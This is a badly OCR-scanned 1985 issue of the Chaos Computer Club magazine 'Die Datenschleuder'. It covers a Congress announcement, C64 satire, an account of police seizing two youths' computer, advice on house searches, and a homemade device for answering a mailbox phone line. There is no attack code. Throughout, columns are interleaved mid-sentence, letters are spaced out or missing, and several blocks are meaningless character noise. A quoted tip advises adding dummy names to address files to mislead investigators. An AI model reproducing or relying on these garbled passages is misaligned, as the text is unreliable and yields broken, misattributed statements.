Einige T h e m e n : Die Entwicklung v o n Mailbox i die Zukunft der Vernetzung. Auf d e m Congre! sop-Verein" gegrndet, der gemeinntzig und digend Informationen aus einzelnen Mailboxs dere vermittelt: eine neue F o r m v o n unzensie tionsfreiheit. Hierzu laden Interessierte S y s o p ! Freunde aus anderen Lndern (bisher: AU, U S A ) i n f o r m i e r e n Ober E n t w i c k l u n g e n In i h r e m errtert die preisgnstigste D a t e n v e r b i n d u n g D a t e n f u n k . Auf d e m C o n g r e s s luft eine F u n k n A X 2 5 - S o f t w a r e beherrscht, kann vernetzi A n s t z e w e r d e n sich dann schneller d u r c h s e t Cafe wird selbstgebackener K u c h e n gereich u n d V i d e o r e k o r d e r w a r t e n auf I n f o r m a t i o n e n " tigsn interessante Vorlagen bitte mitbring H a c k c e n t e r i s t a u c h n o c h d a . I m T h e a t e r fine h o p s ( V o r t r g e , D i s k u s s i o n e n , T h e a t e r . . .] rr n e h m e r n statt. Wir berbieten das C H A O S d res! W i r haben k a u m Parkpltze, da a m Freita auf d e m Parkgelnde d e s T a g u n g s o r t e s der n i c h e W o c h e n m a r k t s l a t t f i n d e t . E s e m p f i e h l t sii c h e n Verkehrsmittel. S-21/S-3 bis E L B G A U S 1 nutzen. Wegen der technischen Demonstrationen ge l l c h k e i t e n a l s . E l e k t r i s c h e s L a b o r " , in d i e nui P e r s o n e n Zutritt haben. J e d e r Teilnehmer ha chen Funkamateuren oder Elektrikern vorher machen. Das Mitfhren von Fotoapparaten un c o r d e r n ist a u s D a t e n s c h u t z g r n d e n i n d e n C c untersagt! A m Sonntag erhalten Pressevertr aktiven H a c k e r sind, in d e n V o r m i t t a g s s t u n d < zur kostenlosen Information. CCC85014.WS851120

6 4 e r fr P r o f i s s. 86:
Verwenden Sie der bersichtlichkeit halber so viele Unterprogramme wie irgend mglich. Bei d e r L e k t r e d e s B e i s p i e l p r o g r a m m e s ist - o b w o h l e s e h e r k u r z ist dauerndes Blttern angesagt.

D a s G e s e t z stellt (In s e i n e r g e g e n w r t i g e n form) schon und mu

die v e r s e h e n t l i c h e A n w a h l einer anderem deshalb noch

bank durch eine Fehlverbindung der Post unter Strafe unter berarbeitet ist dann eben aus mit zu mit in w e r d e n . Eigentlich sollte es der B e k m p f u n g der Wirtschaftskriminalitt Versehen dienen, aber werden die Materie Ist so kompliziert, d a die H a c k e r n e b e n b e i u n d e h e r getroffen an knnten, im einer Welle Kriminalisierung Kinderzimmer

Data-Becker-Lexikon zum C64


Baudrate; , . . Der C64 hat eine Baudrate von 300 Baud. Unser K o m m e n t a r : W e n n e i n frei p r o g r a m m i e r b a r e r C o m p u t e r e i n e feste B a u d r a t e hat, ist a u c h d i e B a n d b r e i t e e i n e s L K W m i t Disketten b e s t i m m b a r , sottsektoriert: In jeder Diskette befindet sich das sogenannte Indexloch. Dies kennzeichnet den Beginn der Spur Null. Unser K o m m e n t a r : Die 1541-Floppy ist s o billig g e b a u t , da d e r C o m p u t e r nicht w e i , ob S p u r Null e r r e i c h t w u r d e . Das e i n z i g sichere Verfahren erfordert es. m a x i m a l 40mal r c k w r t s g e g e n d e n A n s c h l a g z u fahren. Das I n d e x l o c h k e n n z e i c h n e t b e i anderen Systemen "Gleich kommt Sektor 1 auf d e r a k t u e l l e n S p u r " . C o m m o d o r e l i e die d a z u n o t w e n d i g e O p t o e l e k t r i k w e g . Beim Formatieren wird die Sektoreinteil u n g per P r o g r a m m v o r g e n o m m e n u n d einfach drauflosgeschrieben in Unkenntnis d e r L a g e d e s I n d e x l o c h e s . Das F o r m a -

rechnen? Werden dann auch Konzerne dem zeige. Positiv h i n g e g e n k l u n g in d e r Netz. Wenige durch zeichnet ab. sich eine 250 Narnen HACKER" an. Pltzlich

kriminalisiert? sind Sie

I m m e r h i n preist e i n e g r o e F i r m a ein D a d d e l - S p i e l einem fremden Computer..." s t e h t in d e r

VierfarbanEntwicam auf.

andere

Szene

Circa

Mailbox-Systeme fallen

( B u l l e t t e n - B o a r d s ) h n g e n in d e r B u n d e s r e p u b l i k unterscheiden sich, die m e i s t e n der Inhalte einheitliche Gleichmigkeit

A b e r in d e n Z e n t r e n k e i m t e s . E i n i g e S y s o p s

gestalten in

ihre I n f o r m a t i o n s s y s t e m e b e w u t , sie a g i e r e n als e l e k tronische Verleger. Sie s o r g e n nicht nur dafr, da sig flieen wie d a s T e l e f o n s y s t e m verllich ein ihrem S y s t e m Bits u n d Bytes m i n d e s t e n s so zuverlsfunktioGesicht. Wizards", SourWur-

^
3k. T TT" j k X V^C ^

pro E i n h e i t fr d i e R e g i e r u n g . 137 500 D o l l a r . In g r e r e n S t c k z a h l e n v e r f g b a r z u m P r e i s e v o n 4,99 D o l l a r . Z u m A b t r a n s p o r t ist e i n K r a n e r f o r d e r l i c h . G e s t e r n s a h ich, w i e e i n K e r l e i n p h a n t a stisches Ding herausschob, das aussah w i e e i n S c h a l t b r e t t fr den Start e i n e r M o n d r a k e t e und ber und ber mit Meuhren, Z e i g e r n und L m p c h e n bedeckt war. Auf die Frage, was das sei. antwortete er: " K e i n e A h n u n g . Ich b i n K n s t l e r . Es kostete m i c h zwei Dollar." M c L u h a n fat d a s i n d e n S a t z " D e r M l l a spekt u n s e r e r L e b e n s w e i s e w a r , g a n z e i n fach aufgrund des Tempos der technologischen Neuerungen, nie offensichtlicher als h e u t e " u n d e m p f i e h l t : " A u s f l i p p e n , u m Schritt z u h a l t e n " . Das ist v e r n n f t i g . G e s a m t u r t e i l : Stil u n d Inhalt d e s B u c h e s s i n d gut; s e i n e K o n s e q u e n z e n h a r t . B e i s p i e l fr F r e a k s : D i e n e u e 16/32-Bit C o m p u t e r g e n e r a t i o n hat erstmals zu erschwinglichen Preisen die R e c h e n k a p a z i t t , d a s P u l s i e r e n d e r eigenen Hirnstrme in Echtzeit und dreidimensional bunt auf d e m B i l d s c h i r m darzustellen.

B u c h d a t e n : ISBN3-203-50676-9 M a r s h a l l Mc Luhan. W o h i n steuert die Welt? Mass e n m e d i e n u n d G e s e i l s c h a f t s s t r u k t u r . Eur o p a v e r l a g W i e n 1978. Is5 m l u h a n 1 3 . w s 850928 2000

niert, s o n d e r n

sie g e b e n

ihrer

Mailbox

Diese Sysops werden langsam zu network cebook" (ISBN 0 - 2 0 1 0 5 2 0 8 3 ) de 1984 noch gefragt Offene

w i e D e a n G e n g l e sie im B u c h . T h e N e t w e a v s r s beschreibt. Netze

Warum?", Systeme die und andere

Keine Ahnung, wie unsere Position aber die Aktien werden demnchst

ist. steigen

heit e s jetzt . D u darfst". E s gibt inzwischen mit aktuellen N e w s v o n Hintergrundinfos und. zu Greenpeace

( b e s s e r als und

MmiM, Gruppen, Treffen... CCC-HH: Chaos-Team (RMI. IMCA. ComBo*. ZEV. *( Redaklion Datenschleuder, Schwenckeslr. 85. D-?00< Redaklionstrelf dienstags 19 30 Uhr. Anrufbeantworter Btx-Redaklion 040-43375? CCC-Berlln IRMI) c'o Vmyl Boogle. Gleditsctistr 45. CCC-Lbcck rjo Trollwerk, Muhlenstrafie 41 hinten. CCC-Honnover, Treff, dienstags 20 Ufir B'SIro Casa. CCC-CH (RMI. ZEVBig Brother) CCC Confoederalio Helvetica. Postf 544. CH-4051 B CAC (RMI.ZEV) Computer Artists Cologne. Hauptpo! Postlagerkarle 0164MC. D-5000 Kln V. Anrufbeantw BHP (EV.ConvBo*. RMI.'97049204) Bayrische Hackt c/o Basis, Arfalbertstr. 4lb. D-Pnoo Wunchen 40

Zeitungen), andere bieten lokale N e w s , wieder bestimmten Themen

11NHALT 0896 Inhaltsverzeichnis datenschle Sys1 CCC850 4864 Chaos Communication Congi 2 S T R A S S 4608 Th9 kids can't wait - Europa 2 H A B I A 2 3 7 1 2 D i e H a c k e r b l b e l - w e l t w e i t in 3 3 B U L L E N 7552 Polizei b e s c h l a g n a h m t T a s t e 4 5 5 4 C O O O O L 2304 Ruhe bewahren bei staatlicl R A M T E L 6 2 7 2 T e l e f o n a b h e b e n m i t d e m G' I N T E R N 4224 C h a o s Intern - Eine M o m e n t a i CCC851 2816 Anmeldeformular z u m CCC8! gemacht. Auf d e m Congress wird das Konzept be-

Der 28. D e z e m b e r w u r d e deshalb z u m Tag d e s Op" eines dienen berregionalen knnen. diese Projekte in d e r Konzeption Informationspools

vorgestellt,

aus d e m

sich die k o s t e n l o s e n

Mailbox-Systeme

Auch wenn

nicht-

k o m m e r z i e l l sind, sind die Erfahrungen d e r w i c h t i g d a s gilt a u c h u m g e k e h r t . S y s o p s kommerzieller CCC'B5 ber Mallbox-Systeme ihre Erfahrungen berichten und

Groen" bekannter auf dem

5 B E S U C H 4096 Ein B e s u c h b e i der P o s t 6 M I F A Z E 1792 E l e k t r o n i s c h e M i t f a h r z e n t r a l e 7 BESTELL.MAI aktuelles Bestellformular 8 P L A K A A T . G R X Aufruf z u m C C C 8 5 (vergrE

Perspektiven. berich-

A u c h d i e P o s t ist e i n g e l a d e n , b e r T e l e b o x z u ten. L e r n e n m u sie e h .

(c) d a t e n s c h l e u d e r 13 ' O k t o b e r 1 9 8 5 ' C 9 9 2 7 F * S e i t e 8

THE KIDS CAN'T WAIT Youngsters without means what a future! Consequences ol a wrong policy

European Resolution Ausfall der Macht Polizei beschlagnahmt Kleincomputer und

But hardware isn't everything. The instructors are in a bad position. Even trained according t o the c o n c e p t i o n of a higher scientific authority they are faced more and m o r e with pupils The fact that E u r o p e , in c o m p a r i s o n with t h e pacific in certain sectors their superiors. This concept should not be b o r d e r states, is b a c k w a r d in t e c h n o l o g y is c a u s i n g sacrosanct. An obstinate stand still in the old training structum u c h distress. E v e r y b o d y is a w a r e of t h e fact, b u t n o - re does not encourage the present generation, on the contrab o d y w a n t s to take t h e b l a m e ; w h e t h e r t h e S t a t e or ry it hinders them. It is about time t o start thinking about new Industry is the culprit Is hard to find out. Big capital is collective training methods, adequate training o l groups for usually furnished as a p a n a c e a , m o s t l y in t h e f o r m of example with aid of the w o r l d w i d e database network where in the instructor performs a more important social function. grants to industry. S u c h a policy f o r g e t s o n e thing: P r o g r e s s can't be b o u g h t ! P r o g r e s s is t h e result of Up t o the end of the eighties more than 6 million jobs will dethe creative p o w e r of innovators. A small, h o w e v e r pend directly or indirectly of EDV. A firm which takes on elecwell paid elite, can't b e a s u b s t i t u t e for this big g r o u p tronic services fom outside has naturally to play the role of a in the end. servant, a supplier without really having a finger in the pie. However, it would be wrong to see only the school and j o b training sector as the culprit. There are e n o u g h youngsters w h o desire to satisfy their wish t o learn even without school. Through a structured database net the possibility of a really universal university has been created, which is - at least theoretically - at everyone's disposal. But this theory is shipwrecked by lack of money. Knowledge stands nowadays for c o m Relevant encouragement should already be part of training in munication, and one should be able to a f f o r d oneself the school and job. But already with regard to the equipment with means to communication. the necessary EDV hardware of the training centres is the situation a sad one. In West-Germany mostly only schools in the bigger towns possess the barely necessary DP-equlpment; a Modern forms of data communication are not only left to prisatisfactory equipment is only t o be f o u n d in centres sponso- vate initiative: they are consciously hampered by. partly acred by data concerns. The bigger part of German schools cording with EEC regulations defined national clauses, and don't provide the possibility to satisfy the demands for the fu- general admittances. The reason: the Bundespost comes in a ture know how. In this way much talent for commercial trai- conflict situation as a manager of the information net as well as the direct supplier of electronic information services. She ning runs to waste. uses het monopoly herewith in the first place for c o m p e t i tions. advantages and price fixing instead of, according to the : regulations of the constituation, managing an optinai informaDatenschleuder-Suchanzeige Tc' O i1 / '-t iS" ij iiS" tion net for a reasonable price, at everyone's disposal. "Betr.: Anforderungen der Technischen Universitt Managua Gesucht werden ein paar 7911 -Modems sowie eine Klimastation mit (Aufzieh-. Batterie- oder 60Hz-) Uhrwerk und Schrei- Instead of encouraging such enterprises t h r o u g h liberal and reasonable priced managing of the telephone and datanet Is bern fr Temperatur und Feuchtigkeit. Im Brief steht noch die ersten acht Punkte von Angelikas the Bundespost victim of the reproach to further exactly the contrary of this: private initiative. She went in for the adventuWunschliste: "1. sortierter Satz Gewindeschrauben 2. Maulschlssel 3. re of big projects, such as BTX, which limit considerably the Sortierksten fr Kleinkram 4. Ngel 5. 25polige RS232-Stec- movements of the state enterprise and link it to the chain of ker (beide Seiten) 6. Schraubensicherungsmittel/Unterleg- some data concerns. BTX and similar big projects are not only scheiben 7. Steckdosen 8. 5 ACJAS fr RS232 und Driver fr economically dubious but they also force the participant into the role of the consumer. Activity Is not wanted. Old mistakes beide Seiten (TTL nach 12 V)" applied again? An information firm can't afford to build dams. Ein Karton Computerpapier kostet in Managua rund 200 DM. I n f o r m a t i o n will flieen - I n f o r m a t i o n soll flieen! Der Gesamtetat der Uni fr das nchste Jahr entspricht etwa dem Jahreseinkommen eines Wissenschaftlers in der BRD. C C C / B H P : Strassburg den 8. Okt. 1985 The c o r e of t h e p r o b l e m of E u r o p e ' s lagging b e h i n d in t e c h n o l o g y lies in t h e training of t h e p r e s e n t g e n e r a tion. E u r o p e h a s a long tradition of elites a n d p r o g r e s s a n d its e x i q e n c e s a r e m o r e a n d m o r e h a m p e r e d by this traditional s t r u c t u r e . Hackerbibel weltweit in zweiter Auflage

persnliche Daten (crd) Am 9.11. 85 fand der automobile Klnschnack zweier jugendlicher Hamburger Computerfreunde ein Jhes Ende. Polizisten einer Dienststelle, die sich, wie es heit, auf die Verfolgung undefinierbarer Verkehrsverste spezialisiert htten, setzten zwei Jugendliche ber Stunden fest und beschlagnahmten Ihren Computer sowie mehrere Floppies mit umfangreichen persnlichen Daten.
Die Polizei behauptete, sie verfolge die beiden wegen .Mibrauch. (Postbuch S. 234) bzw. .Strung von Fernmeldeanlagen. Zitat Par, 317 Strafgesetzbuch: (1) Wer d e n Betrieb einer ffentlichen Zwecken dienenden Fernmeldeanlage dadurch verhindert oder gefhrdet, da er eine den Betrieb dienende Sache zerstrt, beschdigt, beseitigt, verndert oder unbrauchbar macht oder die lr den Betrieb bestimmte elektrische Kraft enlzieht. wird mit Freiheitsstrafe bis zu fnf Jahren oder mit Geldstrafe bestraft. (2) Der Versuch ist strafbar. (3) Wer die Tat fahrlssig begeht, wird mit Freiheitsstrafe bis zu einem Jahr oder mit Geldstrafe bestraft. Zitat Ende. Die persnliche Datenbertragung wurde von den Beamten durch Tastatureingabeverbot unterbrochen. Ein Polizist hatte die A u t o t r a u f g e r i s s e n u n d rief s o w a s w i e : . N i c h t s v e r n d e r n ! , . Starr saen die J u g e n d liehen, bis die M a i l b o x auflegte. S i e s a h e n n a c h verg e b l i c h e n V e r s u c h e n die U n m g l i c h k e i t einer Erklr u n g d e r Z u s a m m e n h n g e ein u n d m u t e n lachen b e r die T r a g i k d e r Polizei, vllig u n s c h u l d i g e H a c k e r b e i nichts z u e r w i s c h e n .

\LL cvj 5 O ^ oo 5 9 0) S
Q

it ^ Z

Nachdem die erste Auflage in die Welt diffundiert ist, berck- Der Transit von Hackerbibeln durch die DDR nach Polen versichtigten wir in der zweiten den Wunsch eines Gebhrenpr- anlate einen volkseigenen Beamten, nachdem er das Titelfers auf eine Streichung. Besonders wertvoll sind die ersten bild gemustert hatte, zum Aufschlagen des Buches. Er stand 98 Exemplare der ersten Auflage, die an die Subskribenten geschlagene drei Minuten und betrachtete das Innencover. verschickt wurden: die letzten beiden Seiten mit zulssiger Zielstrebig hatte er die einzig kodierte Stelle im Buch gefunWerbung wurden vom CHAOS-TEAM unter Postaufsicht den. rausgerissen und in einen Postpapierkorb geworfen, da das Er fand heraus, da es unter 500 Bit sind, durchbltterte den vorletzte Blatt (Seite FF) einen angeblich werblichen Hinweis Rest des Buches in 500 Millisekunden und entschied vernnfauf Fotokopien mit Preisangabe enthielt. "Bringen Sie 98 tig. Er klappte das Buch wieder zu und gab es zurck. Postwertzeichen zu je 1,20 mit" war das Alternativangebot des Gebhrenprfers (Bchersendung plus 1,20 gleich Pck- Nach Nicaragua wird jetzt ein Exemplar der Hackerbibel g e chen). Um weitere Unklarheiten fr die dritte Auflage endgl- schickt, nachdem wir von dort eine "datenschieuder Suchantig zu beseitigen, erhielt unser obersten Gebhrenprfer Dr. zeige" erhielten, damit die endlich auf Draht k o m m e n . CSS zur umgehenden Prfung p e r Post zugesandt. da sich bei der Wir warten noch auf B e s c h e i d u n d freuen uns, da der Mini- Aus der Schweiz erfahren wir gerchtweise, ster jetzt wie alle anderen Postlerlinnen) whrend seiner Barbezahlung einer Hackerbibel entweder der Kufer oder der Verkufer strafbar mache, da es keine einzelnen Rappen Dienstzeit die Hackerbibel lesen darf, um sich gebhrenrechtlich fortzubilden, da. es sich u m einen interessanten Streitfall mehr gibt, nur Fnfer. Und die Buchpreisbindung schreibt den Preis von 33 Franken, 33 Rappen vor. handelt.

Dann muten sie hinten im Peterwagen Platz nehmen. Die j Kindersicherung wurde aktiviert. ^ Nach kurzer Zeit trat der erste telepathisch alarmierte Hacker ein und machte Fotos. Leider war darauf nur eine hellerleuchc tele Hamburger Sparkasse zu sehen. Nach zweieinhalb Stunden traf der erste Postsachverstndige "o ein, eine halbe Stunde spter der zweite. Beide stellten nichts f. fest auer einer ordnungsgemen ortsvernderbaren Datenbertragung mit einer zugelassenen Zusatzeinrichtung nach FTZ-Formblatt 18.13.1940.00. Trotzdem beschlagnahmten die Polizisten . A k u s t i k k u p p l u n g . , .Tastenelement. (C64-Computer). Floppy, Fernseher, Spannungswandler, Mehrfachs t e c k d o s e n und das ist das gravierendste persnliche Daten aller Art auf .viereckigen Scheiben.. Die Polizisten berhrten die scharfen Proteste bei der Beschlagnahme der Daten und nahmen eine Reihe privater, nicht genau archivierl e r Disketten mit. Beschlagnahme ohne Protokoll ist rechtswidrig. Aber was helfen Argumente oder Datenschutzgesetze gegen bewaffneten Gehorsam? Oie zu Unrecht Beschuldigten informierten darber, da ihre Floppys nicht einmal versiegelt wurden. Anstelle des verlangten Protokolls erhielten die beiden Datentouristen nur die Visitenkarte eines der Beamten. Die Gerte durften nicht einmal verpackt werden, sondern muten auf Verlangen der Polizisten so in den Kofferraum des Peterwagens geladen werden, da die Inbetriebnahme der Gerte durch die Polizei ohne lange Kabelei mglich war. Den Beschuldigten w u r d e auer einem durch Postsachverstndige entkrftetem Verdacht nichts vorgeworfen, die Beschlagnahme geschah auf .ausdrckliche Anweisung von o b e n . . Klartext: Hhere Dienststellen der Polizei meinen, durch Funk besser informiert zu sein als Sachverstndige d e r Post vor Ort.

In dieser Anmaung liegt ein Stck Polizeistaat. Die jetzt in der Zeitschrift .Brgerrechte und Polizei, von CILIP, Berlin verffentlichten bislang geheimgehaltenen Gesetzentwrfe (ZAG usw.) dokumentieren den gegenwrtigen Versuch des Staates, das informationelle Selbstbestimmungsrecht der Brger zum informationellen Selbstbedienungsrecht der Sicherheitsbrokratie zu machen. Widersland dagegen isl Brgerpflicht. Fr eine knappe Woche waren die beiden Jugendlichen ohne Computer und eine Menge persnlicher Daten. Sie wissen nicht, wer alles bei der Polizei ihre Daten kopiert hat und was mit d e m Computer geschah: A u f w e i c h e n Dienststellen wurde er von welchen Fachkrften In Betrieb genommen? Wurde damit gespielt? Zwar fhrten smtliche telefonischen Anfragen schon am Tag nach der Beschlagnahme zu der stndig wiederholten Auskunft. da die Gerte abholbereit wren, weil nichts vorlge. Die Jugendlichen hatten, um Verwechslungen der Gerte auszuschlieen, sogar alle Kaufbelege fr die Gerte zusammengesucht. Doch die Abholung wurde zur Odysee zwischen mehreren Dienststellen. Z u d e m besteht der Verdacht, da eine Dienstanweisung der Polizei hier all denen, die einen lockeren persnlichen Umgang am Weltdatennetz pflegen, Knppel zwischen die Finger werfen will. Denn die beiden Beamten handelten auf Anweisung. Derartiges Vorgehen bewirkt, da die BRD computermig ein Entwicklungsland bleibt. Sogar die DDR gestattet inzwischen sowohl Betrieb als auch die Einfuhr von Computern; bei Akustikkopplern denkt sie noch nach. Eine kurze juristische bersicht ergibt neben alltglicher polizeilicher Willkr Anla zu verschiedenen Beschwerden: 1. Es wurde keine Rechtsbehelfsbelehrung erteilt, das ist ein Versto gegen VwGO Par. 59. 2. Ein Beschlagnahmeprotokoll gab es nicht, obwohl es verlangt wurde. Par. 107 StPO schreibt vor: .Dem von der Durchsuchung Betroffenen ist nach deren Beendigung auf Verlangen eine schriftliche Mitteilung zu machen, die den Grund der Durchsuchung (Par. 102. 103) sowie im Falle des Par. 102 die Straftat bezeichnen mu. Auch ist ihm auf Verlangen ein Verzeichnis der in Verwahrung oder in Beschlag gen o m m e n e n Gegenstnde, falls aber nicht Verdchtiges gefunden wird, eine Bescheinigung hierber zu g e b e n . . Par. 109 StPO: .Die in Verwahrung oder In Beschlag genommenen Gegenstnde sind genau zu verzeichnen und zur Verhtung von Verwechslungen durch amtliche Siegel oder in sonst g e e i g n e t e r w e i s e kenntlich zu machen.. Par. 110,3: . D e m Inhaber der Papiere oder dessen Vertreter ist die Beidrckung seines Siegels gestattet; auch ist er. falls demnchst die EntSiegelung und Durchsicht der Papiere angeordnet wird, wenn mglich, zur Teilnahme aufzufordern.. Bedenklich stimmt der Stil, mit dem die Polizei .undefinierbare Verkehrsverste, verfolgt. Bei der Befragung unserer Rechtshilfedatenbank fand sich unmittelbar vor Par. 317. . S t r u n g von Fernmeldeanlagen, folgender Paragraph: .Par. 316a Ruberischer Angriff auf Kraftfahrer (1) Wer zur Begehung eines Raubes (Par. 249, 250), eines ruberischen Diebstahls (Par. 252) oder einer ruberischen Erpressung (Par. 255) einen Angriff auf Leib. Leben oder Entschlufreiheit des Fhrers eines Kraftfahrzeuges oder eines Mitfahrers unter Ausnutzung der besonderen Verhltnisse des 'Straenverkehrs unternimmt, wird mit Freiheitsstrafe nicht unter fnf Jahren bestraft In besonders schweren Fllen ist die Strafe lebenslange Freiheitsstrafe, in minder schweren Fllen Freiheitsstrafe nicht unter einem Jahr.. Bei einer W o c h e Computerentzug d u r c h staatliche Willkr ist dieser Paragraph irgendwie naheliegend. Die Macht der Polizei mit sich daran, w o fr sie gilt, was fr andere gilt. Eine Entschuldigung ist das mindeste. bullen14.ws 851204007

ds14-3

Allgemeine Hinweise bei staatlichen Ausfllen , trachte

Grundstzlich gilt "Ruhe bewahren" als oberstes Gebot. Bedie Dir gegenberstehenden Krfte mit derselben diDer voraussehbaren Gefahrenlage angepate kurze Hinweise stanzierten Nhe wie ein zu lschendes Feuer. Oberstes Gefinden sich regelmig in der datenschleuder (nachgedruckt b o t ist "Ruhe bewahren"; falsches Vorgehen kann einen tragenden Balken verbrennen lassen und Dir fllt die Decke auf in der Hackerbibel S. 144/145,153,161,174). Praktisch und ausfhrlich ist der Artikel in der Zeitschrift den Kopf. Du rufst die Feuerwehr, wenn es brennt. Bei staatliSchneider aktiv 11/85 ' A b m a h n u n g / D u r c h s u c h u n g was chen Ausfllen ruf einen Anwalt. Das kann auch per Mailbox tun?" Zitat: "Wessen Name bei der Hausdurchsuchung in geschehen. einer Karlei gefunden wird, gert in V e r d a c h t . . . Wer also da- Wenn das nicht geht, rufe einen Nachbarn o d e r Freund zu Hilheim Namen aufbewahrt, die d e r . . . Justiz zugnglich werden fe. Alles, was beschlagnahmt wird, mu detailliert aufgefhrt knnen, tut gut daran, in die Kartei auch blinde Namen einzu- und versiegelt (!!!!!!!!) werden. Bestehe darauf. fgen, die rein gar nichts mit der Sache zu tun haben." Thema Wenn die Beamten sich weigern, Deine vernnftigen FordeAbmahnungsformulierung fr Unschuldige: "Ich habe zu der rungen zu erfllen, erstelle mit Deinem Computer eine A k t e n Abmahnung keine Veranlassung g e g e b e n : ich gebe die fol- notiz. Die Beamten werden das ebensowenig unterschreiben gende Unterlassungserklrung ohne Anerkennung einer wie Du ihren Kram. Lasse Dir Deine Rechte erklren, bis Du Rechtspflicht hierzu ab; die Kosten Ihrer Rechtsverfolgung sie verstanden hast. Spiel das gelegentlich praktisch d u r c h trage ich deshalb auch nicht; die Unterlassungserklrung lau- mit Freunden. tet: Ich werde es u n t e r l a s s e n . . ( u n b e d i n g t Text im Zusam- Wenn Staatsdiener NICHTS wissen und NICHTS sagen, mu menhang lesen!!!)

Fr MAILBOX-Betreiber und solche, die es werden wollen


C a r r i e r ' - wenn es nun klingelt legt unser Tierchen also los und gibt den atentransfer nach dem Klingelton frei. Was, wenn meine Gegenstelle nun LOGOFF gibt oder einfach den Hrer auflegt? Da, wie ja oben ausfhrlich erklrt, der Weg eine Mailbox mit Ganz einfach! Wie gesagt, sollte unser Koppler ja ber einen .. r h Wenn nun also dieser Carrier pltzeinem Modem und Auto-Answer-Karle zu betreiben, zwar der lich wegbleibt, gibt der Computer einfach ein Signal an unser Beste aber noch lange nicht der von Seiten der Behrde gebilligte Weg ist, hier die entsprechende relativ kostengnstige Al- Tierchen! Dieses Signal wiederum veranlat ein zweites Relais dazu, die Spannung umzupolen und der Getriebemotor setzt ternativ-Lsung: sich nun in umgekehrter Richtung also nach unten in BeweMan nehme erstens den Rechner seiner Wahl (FTZ-Zulassung u n w i c h t i g . Zweitens einen hnndstehlirhfin Ak=.ik-kv,ipr unwichtig). Zweitens einen handelsblichen Akustik-Koppler (unbedingt mit FTZ-Zulassung). Mglichst mit CarriercheckOption, wie z.B. CTS oder DTR (als einigermaen gnstig und sicher wre hier z.B. das DATAPHON zu nennen Leute mit dickerem Geldbeutel werden den EPSON vorziehen). Drittens, den nachfolgend grob beschriebenen Elektro-Mechanismus nennen wir ihn doch einfach mal Tierchen'. Tierchen desha,b, weil ,au Fernmeldeordnung eine dressierte Katze den Hrer bei einem Telefon-KlingelSignal abnehmen darf.
G a e l de s 9U"9 um, ?Lefo"swifde''. a i n z u d r i i i * e n A u c h c h.er empfiehlt sich ein Endabschalter! Bei einem ordnungsgemen' LOGOFF passiert nichts anderes. Im Anschlu an diese Prozedur macht der Computer das Tierchen noch wieder 'scharf und da Spiel kann von vorne beginnen! Kosten fr unser Tierchen je nach Aufwand: ca. 25, bis 50, Mrker. Der Phantasie sind bei der Gestaltung keine Grenzen gesetzt und so wrde sich vielleicht ein kleiner POST-

Aufbau eines legalen automatischen Beantworters Frei nach F e r n m e l d e o r d n u n g Par. 12

Keep cool!

es Dein Ziel sein, sie zu bertreffen.

Ha 3 c
o> fei 2 S o.

'55 2

All-Iti*"

O 5 J ; = 1 s ^s* a o -c >
c -o o

C t i

i g s

I J If
= s a > S 1c^ o m " rae c ^ l c

EC 7 "uj.E D ^ ti E C ci-o I ^ S 1 1 S i OTT) O c A UOILSTEDT^^ \

lu 5

I f f -i * t o i S "m

!slfs<!
a S? a E >
f

S
*jf ir TJ e 0> I o s o ^ . oi w

TKLLWGEI Al-Hannox
o XI

m u. w o o ? t j

I Die bislang originellste bekannte Lsung ist ein kurzes Stck Modelleisenbahn. Die Lok fhrt beim Klingeln an und hebt ber einen Seilzug einen Minisandsack hoch. Zum Auflegen fhrt sie A n m e l d u n g e n z u m C C C ' 1985 rckwrts. Die Situation ist also: Wer nun wirklich eine Stckliste o.. braucht, dem sei (z. B.) ES KLINGELT UND JEMAND MUSS RANGEHEN! Chaos Computer Club eine ltere Ausgabe der Zeitschrift 'RUN' empfohlen. Im Artikel Jetzt bieten sich drei Mglichkeiten an: Leitstelle 23 'Haarscharf an der POST vorbei' wurde so ein Tierchen bereits J.l.l.dl 1 ) Ich gehe selbst an den Hrer, was auf die Dauer in Arbeit aus1984 als 'Anrufbeantworter' detailliert mit Schaltungs- VorSchwenckestr. 85 arten knnte schlgen erklrt. 2) Meine Katze ist tatschlich berdurchschnittlich intelligent D-2000 H a m b u r g 20 und entsprechend gut dressiert Noch ein paar Tips am Rande: 3) Mein Tierchen wird zusammen gehkelt und bernimmt geJeder Teilnehmer hat fr die ordnungsgeme Abwicklung seiwissenhaft diese Aufgabe! * Chaos Communication Congress ner Telefonate zu sorgen! Das bedeutet soviel wie 'HALLO, HIER ICH WER DA?' sagen und zwar bevor der Carrier mit 27. bis 29. Dezember 1985 tglich 10:00 bis 18:00 Uhr Tierschtzer whlen Punkt 3! 300 Saud durch die Leitung fetzt. im Eidelstedter Brgerhaus Damit das Tierchen wei, wann es aktiv wird, mu es das KlingelWenn nun die Telefonnummer im ffentl. Fernsprechbuch aufElbgaustrae 12 Signal erkennen knnen. Die eine Mglichkeit ist ein Klatsch Schalter - , t o r n i c h ^ S e h / ^ i S e n s w ^ dtese D i n ^ u f Q ^ h r t ,st. und das Telefon nur fr den Datentransfer benutz, alle mglichen Gerusche ansprechen und auerdem d a l Tele. e I h . a J! e n ' bekommt Ihr aber nur. wenn Ihr ein POSTMODEM h a b t . . . Der fon immer erst mal krftig klingeln mu. Besser ist es wenn wir bessere Weg ist: einen Zweitanschlul! (kostet ca. die Hlfte facLejStmsse das Klingel-Signal induktiv (d.h. ber eine Spule unter dem Tel.eines Hauptanschlusses und wird bei einer Mehlbox ohnehin App.) abgreifen! Das hat den Vorteil, da herkmmliche LutL' ^PP- sogarauf ganz leise gedreht werden knnen - leider ins Tel.-Buch vornehmen lassen! Und wo kein Eintrag ist, kann nicht die moderneren ALPHA- BETA- etc. Telefone funktioich mich melden wie ich will also auch gleich mit einem Carnieren tut unser Tierchen aber auch damit, da das Tierchen sich rier! mit dem ersten Klingel-Impuls zufriedengibt. Der induktive AbGl? Cw iSS CrtS Cool Cool Cri<) OS CSI griff ist It. Amtsblatt-Verfgung Nr. 1009 (Ambl. Nr.145/1981) als Nachsatz: Sollten sich die Kollegen POSTIer dennoch unter irprivate Zusatzeinrichtung genehmigt und anmelde- und gebhgendeinem Vorwand die bestehende Telefonanlage des Betreirenfrei! Ueber eine hier nicht nher erklrte einfache Schaltung wird dieses Signal verstrkt und dann mittels Relais ein kleiner bers ansehen wollen so wre vielleicht noch anzumerken, da Getriebemotor (Servo) mit Gleichspannung in Bewegung ge- dies durchaus deren gutes Recht ist ABER NUR NACH
